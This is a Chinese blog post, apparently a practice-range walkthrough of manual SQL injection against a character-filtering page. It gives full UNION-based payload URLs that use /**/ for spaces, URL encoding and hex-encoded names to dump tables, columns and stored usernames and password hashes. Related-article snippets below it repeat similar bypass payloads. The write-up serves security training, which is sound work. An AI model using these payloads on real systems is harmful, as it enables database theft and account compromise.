墨者靶场-SQL过滤字符后手工注入漏洞测试(第1题)

最新推荐文章于 2022-03-12 00:09:24 发布
最新推荐文章于 2022-03-12 00:09:24 发布
阅读量288 收藏
点赞数
分类专栏: 靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/103080495
版权

                                                  墨者学习

                                                 By/shy014

  1. 进去首页又看到熟悉的公告

  1. 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没有反应。

  1. 经过尝试,用/**/代替空格,然后将URL进行URL编码就可以绕过
  2. 确定有4个字段

5,确定回显位置

  1. 确定当前数据库和用户

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,database(),user(),4#

6,确定当前数据库中的表名(库名要用hex编码 直接使用database()我没成功)

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,group_concat(table_name),version(),4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x6d6f7a68655f64697363757a5f73746f726d67726f7570

7,确定表中的字段名

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,group_concat(column_name),version(),4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x73746f726d67726f75705f6d656d626572

8,确定字段的值

http://219.153.49.228:46365/new_list.php

?id=2/**/union/**/select/**/1,group_concat(id,name,password),version(),4/**/from/**/stormgroup_member

9.破解MD5 登陆获得key

shy014
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
笔记:SQL过滤字符手工注入漏洞测试(第1)
m0_67399862的博客
05-26 527
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
墨者学院SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1194
靶场地址: SQL过滤字符手工注入漏洞测试(第1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
墨者SQL过滤字符手工注入漏洞测试(第1)
wswr的博客
03-12 1942
思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤 那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替 简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了 ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶 总结
墨者 - SQL过滤字符手工注入漏洞测试(第1)
吃肉唐僧的博客
07-04 1322
一开始使用order by,union select ,and 字段,发现返回并没有变化。 推测这些字段是已经过滤掉了 后来,上网查询后发现 ,不但这些字段过滤,还有空格和‘=’也被过滤掉了 所以‘=’可以用Like 替代,空格用/**/,url 要编码转义 在这里有个坑,花了我不少时间 一般url都是用在线url解码,例如:https://tool.chinaz.com/tool...
墨者学院SQL过滤字符手工注入漏洞测试(第1)
痴人说梦梦中人
11-13 312
1、 我也没想到那么多弯弯绕绕的,看到评论区有提示,就照做了,编写url编码脚本,获取注入payload,测试回显位置。 #!/usr/bin/env python # -*- coding:UTF-8 -*- #time:2019/11/9 1:03 #author:White9527 from urllib import parse import re #查询语句 s1 = """ord...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者学院 - SQL过滤字符手工注入漏洞测试(第1)
多崎巡礼的博客
09-28 2677
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
墨者学院 SQL过滤字符手工注入漏洞测试(第3)
a519395243的博客
12-21 1441
 手工注入 墨者学院 SQL过滤字符手工注入漏洞测试(第3) 使用sqlmap 跑,跑不出表名,所以手工注入 点击进去靶场 域名url为:   http://219.153.49.228:41774/new_list.php?id=1   第一步:判断是否有注入点     http://219.153.49.228:41774/new_list.php?id=1'    出...
墨者学院 - SQL手工注入漏洞测试(MongoDB数据库)
多崎巡礼的博客
08-16 2053
# 查看是否有注入点 http://ip/new_list.php?id=1' # 想办法闭合语句,查看所有集合 # db.getCollectionNames()返回的是数组,需要用tojson转换为字符串。并且mongodb函数区分大小写 http://ip/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()...
墨者 - SQL过滤字符手工注入漏洞测试(第2)
吃肉唐僧的博客
07-11 634
一开始直接用order by 测试,被拦截 后来试着绕过,空格用/**/代替,=用like代替 可以绕过,成功执行 测试到字段有4个,用union select 1,2,3,4 发现被拦截无法执行,猜想是拦截了关键字,试着把关键字段得某个字母转编码 /**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,2,3,4 执行成功 ...
0x2F.SQL过滤字符手工注入漏洞测试(第1)
qq_31679787的博客
11-14 517
经过测试,发现空格,符号等都被过滤,所以通过替换被过滤的符号并且进行url编码后才能继续注入测试列数; /**/order/**/by/**/5# %2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%35%23 以下级联查询需将id=1改为id=-1,才能显示级联后的查询内容; 测试显位点; /**/union/*...
墨者 - SQL手工注入漏洞测试(Sql Server数据库)
吃肉唐僧的博客
07-03 1873
/new_list.asp?id=2 and 1=2 ,返回页面没报错 /new_list.asp?id=2 order by 1 ,测试有多少个字段,知道order by 4还有页面回显 这里有个坑,一开始走正常的流程测回显位置 /new_list.asp?id=2 and 1=2 union select 1,2,3,4 , 用 union select 连...
SQL注入绕过空格过滤
热门推荐
gam0n的博客
06-05 1万+
一、通过注释绕过空格注释即/**/通过注释取代空格eg:  or/**/'me'/**/=/**/'isme'二、通过括号绕过空格eg: and(1=0)
SQL注入1
慢慢变小佬的博客
07-06 757
service mysql start;mysql -u root -q;use mysql;show databases;id=1 order by 3 判断列数id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,use(),database() 查询数据库名id=-1 union select 1,(select table_name fr...
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值